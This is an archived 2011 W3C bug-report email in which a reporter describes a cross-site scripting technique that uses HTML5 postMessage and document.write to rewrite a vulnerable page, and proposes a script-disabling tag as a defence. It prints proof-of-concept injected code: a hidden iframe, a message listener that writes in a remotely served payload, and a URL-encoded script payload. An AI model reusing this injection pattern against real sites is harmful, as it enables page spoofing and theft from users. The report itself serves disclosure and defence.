[Bug 12469] New: Dynamic Cross-Site Scripting and Page Repainting from bugzilla@jessica.w3.org on 2011-04-11 (public-html-bugzilla@w3.org from April 2011)

From: <bugzilla@jessica.w3.org>
Date: Mon, 11 Apr 2011 10:02:41 +0000
To: public-html-bugzilla@w3.org
Message-ID: <bug-12469-2486@http.www.w3.org/Bugs/Public/>

http://www.w3.org/Bugs/Public/show_bug.cgi?id=12469

           Summary: Dynamic Cross-Site Scripting and Page Repainting
           Product: HTML WG
           Version: unspecified
          Platform: All
        OS/Version: All
            Status: NEW
          Severity: critical
          Priority: P2
         Component: HTML5 spec (editor: Ian Hickson)
        AssignedTo: ian@hixie.ch
        ReportedBy: simon.young90@live.com
         QAContact: public-html-bugzilla@w3.org
                CC: mike@w3.org, public-html-wg-issue-tracking@w3.org,
                    public-html@w3.org


It has come to my attention in my studies that the addition of cross-document
messaging in HTML5 allows a new, dynamic form of cross-site scripting to be
developed, employing legitimate communications between injected content. By
accompanying this with the document.wrtie() function, this could then be used
to dynamically control �repaint� the entire content of a webpage vulnerable to
code injection. A website could then be completely simulated by the XSS attack
while still residing on a legitimate domain, a man-in-the-middle blue-pill esk
attack.

In this example, dynamically served code is appended to the original page,
removing document.getElementsByTagName('html')[0].innerHTML will allow the page
to be completely changed:

>>>>>Injected Code:

<iframe id="mommy" src="URL" style="visibility:hidden; height:0;
width:0"></iframe>
<script>
    window.addEventListener ("message", recvPayload, false);

    function recvPayload (event) {
        document.write(document.getElementsByTagName('html')[0].innerHTML +
unescape(event.data));
    }

    function requestPayload () {
        var frame = document.getElementById ("mommy");
        frame.contentWindow.postMessage ("baby wants milk!", "*");
    }
</script>
<a href="" onClick="requestPayload ()"> <!-- clickjacking -->

>>>>Server Page:

<script>
    window.addEventListener ("message", sendPayload, false);

    payload = ("%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%44%79%6E%61%6D"+
                 "%69%63%20%58%53%53%21%22%29%3B%3C%2F%73%63%72%69%70%74%3E");

    function sendPayload (event) {
        event.source.postMessage (payload, event.origin);
    }
</script>

I propose the addition of a tag which, disables any script within its bounds
perhaps along the lines of.. <plaintext></plaintext> this would allow web
developers to disable areas of a page from using script, blocking XSS attacks.

I would appreciate your thoughts on this.

Many Thanks,
Simon Young

-- 
Configure bugmail: http://www.w3.org/Bugs/Public/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the QA contact for the bug.

Received on Monday, 11 April 2011 10:02:44 UTC